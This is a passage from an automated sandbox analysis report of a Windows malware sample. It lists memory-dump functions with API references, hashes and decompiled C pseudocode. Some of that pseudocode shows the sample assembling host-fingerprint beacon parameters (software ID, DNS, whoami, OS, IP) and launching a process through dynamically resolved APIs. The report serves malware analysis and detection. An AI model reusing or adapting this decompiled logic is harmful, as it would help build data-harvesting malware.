Process32Next.KERNEL32(00000000,?), ref: 02A7A6AB
CloseHandle.KERNEL32(00000000), ref: 02A7A6BA

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 250e14dc511e1aec65565effd191eabf4cc0be4e119b068a0dcc66e9990c4d97
Instruction ID: 204d26d4f8b5149ce93d5c961e5b1e88f6bb82744d473d308b9762f9dad36f06
Opcode Fuzzy Hash: 250e14dc511e1aec65565effd191eabf4cc0be4e119b068a0dcc66e9990c4d97
Instruction Fuzzy Hash: AEF090366411247AD720BBA69D89EEF76ADDFC5310F010161E909D2201EF20DA5A8AAD

Uniqueness

Uniqueness Score: -1.00%

Function 02A71F13, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02A71F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2a7d018; // 0xfa73a582
				asm("bswap eax");
				_t27 =  *0x2a7d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2a7d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2a7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x2a7d2a8; // 0x229a5a8
				_t3 = _t30 + 0x2a7e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x2a7d02c,  *0x2a7d004, _t25);
				_t33 = E02A756CD();
				_t34 =  *0x2a7d2a8; // 0x229a5a8
				_t4 = _t34 + 0x2a7e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02A758DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2a7d2a8; // 0x229a5a8
					_t6 = _t83 + 0x2a7e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2a7d238, 0, _t96);
				}
				_t97 = E02A7A199();
				if(_t97 != 0) {
					_t78 =  *0x2a7d2a8; // 0x229a5a8
					_t8 = _t78 + 0x2a7e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2a7d238, 0, _t97);
				}
				_t98 =  *0x2a7d32c; // 0x4d195b0
				_a32 = E02A74622(0x2a7d00a, _t98 + 4);
				_t42 =  *0x2a7d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2a7d2a8; // 0x229a5a8
					_t11 = _t74 + 0x2a7e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2a7d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2a7d2a8; // 0x229a5a8
					_t13 = _t71 + 0x2a7e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2a7d238, 0, 0x800);
					if(_t100 != 0) {
						E02A7518F(GetTickCount());
						_t50 =  *0x2a7d32c; // 0x4d195b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2a7d32c; // 0x4d195b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2a7d32c; // 0x4d195b0
						_t103 = E02A71BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2a7c28c);
							_push(_t103);
							_t62 = E02A7361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02A76777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02A76761();
								}
								HeapFree( *0x2a7d238, 0, _v44);
							}
							HeapFree( *0x2a7d238, 0, _t103);
						}
						HeapFree( *0x2a7d238, 0, _t100);
					}
					HeapFree( *0x2a7d238, 0, _a24);
				}
				HeapFree( *0x2a7d238, 0, _t105);
				return _a12;
			}

0x02a71f13
0x02a71f13
0x02a71f13
0x02a71f18
0x02a71f1e
0x02a71f28
0x02a71f2a
0x02a71f2a
0x02a71f37
0x02a71f42
0x02a71f45
0x02a71f50
0x02a71f53
0x02a71f58
0x02a71f5b
0x02a71f60
0x02a71f63
0x02a71f6f
0x02a71f7c
0x02a71f7e
0x02a71f84
0x02a71f89
0x02a71f94
0x02a71f96
0x02a71f99
0x02a71fa0
0x02a71fa4
0x02a71fa6
0x02a71fab
0x02a71fb7
0x02a71fb9
0x02a71fc5
0x02a71fc7
0x02a71fc7
0x02a71fd2
0x02a71fd6
0x02a71fd8
0x02a71fdd
0x02a71fe9
0x02a71feb
0x02a71ff7
0x02a71ff9
0x02a71ff9
0x02a71fff
0x02a72012
0x02a72016
0x02a7201d
0x02a72020
0x02a72025
0x02a72030
0x02a72032
0x02a72035
0x02a72035
0x02a72037
0x02a7203e
0x02a72041
0x02a72046
0x02a72050
0x02a72052
0x02a7205a
0x02a72073
0x02a72077
0x02a72083
0x02a72088
0x02a72091
0x02a720a2
0x02a720a6
0x02a720af
0x02a720b5
0x02a720c2
0x02a720cf
0x02a720d5
0x02a720e1
0x02a720e7
0x02a720e8
0x02a720ed
0x02a720f3
0x02a720f9
0x02a72100
0x02a72107
0x02a7210d
0x02a72114
0x02a72118
0x02a72123
0x02a72128
0x02a7212e
0x02a72137
0x02a72137
0x02a72148
0x02a72148
0x02a72157
0x02a72157
0x02a72166
0x02a72166
0x02a72178
0x02a72178
0x02a72187
0x02a72198

APIs

GetTickCount.KERNEL32 ref: 02A71F2A
wsprintfA.USER32 ref: 02A71F77
wsprintfA.USER32 ref: 02A71F94
wsprintfA.USER32 ref: 02A71FB7
HeapFree.KERNEL32(00000000,00000000), ref: 02A71FC7
wsprintfA.USER32 ref: 02A71FE9
HeapFree.KERNEL32(00000000,00000000), ref: 02A71FF9
wsprintfA.USER32 ref: 02A72030
wsprintfA.USER32 ref: 02A72050
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02A7206D
GetTickCount.KERNEL32 ref: 02A7207D
RtlEnterCriticalSection.NTDLL(04D19570), ref: 02A72091
RtlLeaveCriticalSection.NTDLL(04D19570), ref: 02A720AF

Part of subcall function 02A71BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02A720C2,?,04D195B0), ref: 02A71BE1
Part of subcall function 02A71BB6: lstrlen.KERNEL32(?,?,?,02A720C2,?,04D195B0), ref: 02A71BE9
Part of subcall function 02A71BB6: strcpy.NTDLL ref: 02A71C00
Part of subcall function 02A71BB6: lstrcat.KERNEL32(00000000,?), ref: 02A71C0B
Part of subcall function 02A71BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02A720C2,?,04D195B0), ref: 02A71C28

StrTrimA.SHLWAPI(00000000,02A7C28C,?,04D195B0), ref: 02A720E1

Part of subcall function 02A7361A: lstrlen.KERNEL32(04D19A48,00000000,00000000,74ECC740,02A720ED,00000000), ref: 02A7362A
Part of subcall function 02A7361A: lstrlen.KERNEL32(?), ref: 02A73632
Part of subcall function 02A7361A: lstrcpy.KERNEL32(00000000,04D19A48), ref: 02A73646
Part of subcall function 02A7361A: lstrcat.KERNEL32(00000000,?), ref: 02A73651

lstrcpy.KERNEL32(00000000,?), ref: 02A72100
lstrcpy.KERNEL32(00000000,00000000), ref: 02A72107
lstrcat.KERNEL32(00000000,?), ref: 02A72114
lstrcat.KERNEL32(00000000,00000000), ref: 02A72118

Part of subcall function 02A76777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 02A76829

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02A72148
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02A72157
HeapFree.KERNEL32(00000000,00000000,?,04D195B0), ref: 02A72166
HeapFree.KERNEL32(00000000,00000000), ref: 02A72178
HeapFree.KERNEL32(00000000,?), ref: 02A72187

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: 3f866ba64e0383e1cf30380b16fede6a86cf97b3b2fa6978df0439475ee7336e
Instruction ID: f908d386895c8225772815228aab2f9fab2a31d839025cf457180f68fe3e60fa
Opcode Fuzzy Hash: 3f866ba64e0383e1cf30380b16fede6a86cf97b3b2fa6978df0439475ee7336e
Instruction Fuzzy Hash: 5F618F31980600AFD7119B64DC84F5AB7EEEF48354F040915F909D7260DF35E92B9BAD

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF2EBD, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6DDF2EC5
_free.LIBCMT ref: 6DDF2EDE

Part of subcall function 6DDEB190: HeapFree.KERNEL32(00000000,00000000,?,6DDF49A1,00000000,?,?,?,00000000,?,6DDECF78,00000018,6DE191C8,00000008,6DDECEC5,?), ref: 6DDEB1A4
Part of subcall function 6DDEB190: GetLastError.KERNEL32(00000000,?,6DDF49A1,00000000,?,?,?,00000000,?,6DDECF78,00000018,6DE191C8,00000008,6DDECEC5,?,6DDE17F0), ref: 6DDEB1B6

_free.LIBCMT ref: 6DDF2EF1
_free.LIBCMT ref: 6DDF2F0F
_free.LIBCMT ref: 6DDF2F21
_free.LIBCMT ref: 6DDF2F32
_free.LIBCMT ref: 6DDF2F3D
_free.LIBCMT ref: 6DDF2F61
RtlEncodePointer.NTDLL(6DEB1328), ref: 6DDF2F68
_free.LIBCMT ref: 6DDF2F7D
_free.LIBCMT ref: 6DDF2F93
_free.LIBCMT ref: 6DDF2FBB

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 7182866ccfe7459937b2f109a705405a4c92f4e9677c61dc83390a343603206f
Instruction ID: 1c007b3b1be430354f2ba3d1cf3c7ecd09d0a6c3610c928f1dfd84ef5924dca0
Opcode Fuzzy Hash: 7182866ccfe7459937b2f109a705405a4c92f4e9677c61dc83390a343603206f
Instruction Fuzzy Hash: 86215136905792CBDB21BFA5DA447653BF4EF0A778353002EF948D7280DB34B845CA96

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE5410, Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 436COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 6DDE54E2
_localeconv.LIBCMT ref: 6DDE54F8
_strcspn.LIBCMT ref: 6DDE552F
std::ios_base::getloc.LIBCPMTD ref: 6DDE5544
ctype.LIBCPMTD ref: 6DDE558B
ctype.LIBCPMTD ref: 6DDE55CA
std::ios_base::getloc.LIBCPMTD ref: 6DDE55D9
_Mpunct.LIBCPMTD ref: 6DDE561C
std::ios_base::width.LIBCPMTD ref: 6DDE5907

Strings

@, xrefs: 6DDE579C

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
String ID: @
API String ID: 484443084-2766056989
Opcode ID: 2577b05be2d452fd8e19def5210cbd388930e30312cd85c4c6850a41d2946505
Instruction ID: 427adce6f9feaef8cd2ce3ece5dd082ba9a5f298a693825922255ff3e355eaa0
Opcode Fuzzy Hash: 2577b05be2d452fd8e19def5210cbd388930e30312cd85c4c6850a41d2946505
Instruction Fuzzy Hash: A1024AB1904259DFCB04DF98C890FEEBBB5BF88344F148159F519AB291D734AA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE9B5B, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDE9B62
std::_Lockit::_Lockit.LIBCPMT ref: 6DDE9B6C

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE9B83

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

codecvt.LIBCPMT ref: 6DDE9BA6
std::bad_exception::bad_exception.LIBCMT ref: 6DDE9BBA
__CxxThrowException@8.LIBCMT ref: 6DDE9BC8
std::_Facet_Register.LIBCPMT ref: 6DDE9BDE

Strings

bad cast, xrefs: 6DDE9BB2

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: fd4584a3d2ad2f6d63c1c0b899b0736963f6d11f5a8310a99cba4caee2b9c167
Instruction ID: 248d7f70eb776da9705ff6a767049ccdcf97e4040ea2d87886a862baf397034c
Opcode Fuzzy Hash: fd4584a3d2ad2f6d63c1c0b899b0736963f6d11f5a8310a99cba4caee2b9c167
Instruction Fuzzy Hash: A0016D32919229DBCF01FBA4C940AEE7775BF457A8F520219F614AB290DF34AA04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02A76C38, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02A76C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2a7d33c; // 0x4d19798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02A7A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2a7c18c;
				}
				_t46 = E02A718A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02A7A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2a7d2a8; // 0x229a5a8
						_t16 = _t75 + 0x2a7eb08; // 0x530025
						 *0x2a7d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02A7A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2a7c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02A7A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02A7A734(_v20);
						} else {
							_t66 =  *0x2a7d2a8; // 0x229a5a8
							_t31 = _t66 + 0x2a7ec28; // 0x73006d
							 *0x2a7d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02A7A734(_v12);
				}
				return _v24;
			}

0x02a76c40
0x02a76c46
0x02a76c4d
0x02a76c53
0x02a76c57
0x02a76c5b
0x02a76c5e
0x02a76c63
0x02a76c68
0x02a76c6a
0x02a76c6a
0x02a76c73
0x02a76c78
0x02a76c7d
0x02a76c83
0x02a76c8d
0x02a76c96
0x02a76c9d
0x02a76cb6
0x02a76cbb
0x02a76cc0
0x02a76cc9
0x02a76cd2
0x02a76ce3
0x02a76cec
0x02a76cf0
0x02a76cf4
0x02a76cf9
0x02a76cfe
0x02a76d00
0x02a76d00
0x02a76d0a
0x02a76d13
0x02a76d1a
0x02a76d32
0x02a76d36
0x02a76d73
0x02a76d38
0x02a76d3b
0x02a76d43
0x02a76d54
0x02a76d60
0x02a76d68
0x02a76d6c
0x02a76d6c
0x02a76d36
0x02a76d7b
0x02a76d80
0x02a76d87

APIs

GetTickCount.KERNEL32 ref: 02A76C4D
lstrlen.KERNEL32(?,80000002,00000005), ref: 02A76C8D
lstrlen.KERNEL32(00000000), ref: 02A76C96
lstrlen.KERNEL32(00000000), ref: 02A76C9D
lstrlenW.KERNEL32(80000002), ref: 02A76CAA
lstrlen.KERNEL32(?,00000004), ref: 02A76D0A
lstrlen.KERNEL32(?), ref: 02A76D13
lstrlen.KERNEL32(?), ref: 02A76D1A
lstrlenW.KERNEL32(?), ref: 02A76D21

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: ec4bdc97144e948bc0f7387368bf82b3dca42d0bffc30c11091db1248cf28d9b
Instruction ID: 25cfd0e99d09345ceab388dbc688b8ae3bf321627cec25dace31d5ad7ad0fd5e
Opcode Fuzzy Hash: ec4bdc97144e948bc0f7387368bf82b3dca42d0bffc30c11091db1248cf28d9b
Instruction Fuzzy Hash: 07416A72D40609FBCF11AFA4CD48ADEBBBAEF44314F054061E904AB211DB35DA25DF98

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3120, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE314A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3163

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE31A5

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: 20f409384e1fe225cd2ca329a3454cc2caa9d590dd4f60e0ed9409eebe07abf3
Instruction ID: ab1dad3940873c6a0b0893b5214e162abf470d60e5bd31fe5eb4232d5f86cbaf
Opcode Fuzzy Hash: 20f409384e1fe225cd2ca329a3454cc2caa9d590dd4f60e0ed9409eebe07abf3
Instruction Fuzzy Hash: B6310AB1D14209DFCB04DFA9C981AFEBBB5FB49354F104669E525A7390DB34AA00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3220, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE324A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3263

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE32A5

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: cc63de93f43cc173ba30ad9e4c92ca652ea0d45de07ef542d79b37c306d7a07d
Instruction ID: 41891caf507fc1e5ccdffb7cd97f1ee4170a23a313634b8bb603dd3f44ddc9d0
Opcode Fuzzy Hash: cc63de93f43cc173ba30ad9e4c92ca652ea0d45de07ef542d79b37c306d7a07d
Instruction Fuzzy Hash: 25311CB1D14209DFCB04DFA8C981EFEBBB4FB49354F104629E525A7390DB346A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE6320, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 352COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6DDE63D8
ctype.LIBCPMTD ref: 6DDE6447
std::ios_base::getloc.LIBCPMTD ref: 6DDE6453
_Mpunct.LIBCPMTD ref: 6DDE6487
std::ios_base::width.LIBCPMTD ref: 6DDE66EE

Strings

@, xrefs: 6DDE6583

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
String ID: @
API String ID: 2441703863-2766056989
Opcode ID: e93665f70b4bf84dbde663e0cb9b3d956b47a8022b786d73ca5cd67be8054e1f
Instruction ID: 94a7b437cbc1589e09f3b3b5d918430e72d04a0303b10469fb1ecef0deeacedb
Opcode Fuzzy Hash: e93665f70b4bf84dbde663e0cb9b3d956b47a8022b786d73ca5cd67be8054e1f
Instruction Fuzzy Hash: 19E15BB1A04248DFCB04DF94C990BEEBBB5BF48344F14865DF61AAB251D734AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2490, Relevance: 10.8, APIs: 7, Instructions: 299COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6DDE24C7
std::ios_base::getloc.LIBCPMTD ref: 6DDE259F
char_traits.LIBCPMTD ref: 6DDE266F
ctype.LIBCPMTD ref: 6DDE26C9
char_traits.LIBCPMTD ref: 6DDE270F
char_traits.LIBCPMTD ref: 6DDE27AD
std::ios_base::width.LIBCPMTD ref: 6DDE27DD

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
String ID:
API String ID: 2376101104-0
Opcode ID: 8e21c28fef35dacbe8b50eb64292d5c4827fbd1c342b3d380dfce6ae57a6a13f
Instruction ID: 8f66b69915f7fd180045d4c070f51d799ce27efb90b0af99dab2d99a528fbbe4
Opcode Fuzzy Hash: 8e21c28fef35dacbe8b50eb64292d5c4827fbd1c342b3d380dfce6ae57a6a13f
Instruction Fuzzy Hash: ACD10B74D0420ADFDB14EFA4C990BEEBBB1FF88388F108119E545AB355D735AA41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A78EA1, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02A78EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02A7592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02A7A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2a7d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2a7d2a8; // 0x229a5a8
					_t18 = _t47 + 0x2a7e3e6; // 0x73797325
					_t68 = E02A73C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2a7d2a8; // 0x229a5a8
						_t19 = _t50 + 0x2a7e747; // 0x4d18cef
						_t20 = _t50 + 0x2a7e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02A7A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02A7A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2a7d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02A7A734(_t70);
				goto L12;
			}

0x02a78ea9
0x02a78ea9
0x02a78eb8
0x02a78ebf
0x02a78ec4
0x02a78fd1
0x02a78fd8
0x02a78fd8
0x02a78ed3
0x02a78edb
0x02a78ede
0x02a78ee3
0x02a78ef8
0x02a78efe
0x02a78eff
0x02a78f02
0x02a78f08
0x02a78f0b
0x02a78f10
0x02a78f18
0x02a78f24
0x02a78f28
0x02a78fb8
0x02a78f2e
0x02a78f2e
0x02a78f33
0x02a78f3a
0x02a78f4e
0x02a78f52
0x02a78fa1
0x02a78f54
0x02a78f55
0x02a78f5c
0x02a78f75
0x02a78f77
0x02a78f7b
0x02a78f82
0x02a78f9c
0x02a78f84
0x02a78f8d
0x02a78f92
0x02a78f92
0x02a78f82
0x02a78fb0
0x02a78fb0
0x02a78f28
0x02a78fbf
0x02a78fc8
0x02a78fcc
0x00000000

APIs

Part of subcall function 02A7592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02A78EBD,?,00000001,?,?,00000000,00000000), ref: 02A75952
Part of subcall function 02A7592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02A75974
Part of subcall function 02A7592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02A7598A
Part of subcall function 02A7592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02A759A0
Part of subcall function 02A7592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02A759B6
Part of subcall function 02A7592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02A759CC

memset.NTDLL ref: 02A78F0B

Part of subcall function 02A73C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02A78F24,73797325), ref: 02A73C59
Part of subcall function 02A73C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02A73C73

GetModuleHandleA.KERNEL32(4E52454B,04D18CEF,73797325), ref: 02A78F41
GetProcAddress.KERNEL32(00000000), ref: 02A78F48
HeapFree.KERNEL32(00000000,00000000), ref: 02A78FB0

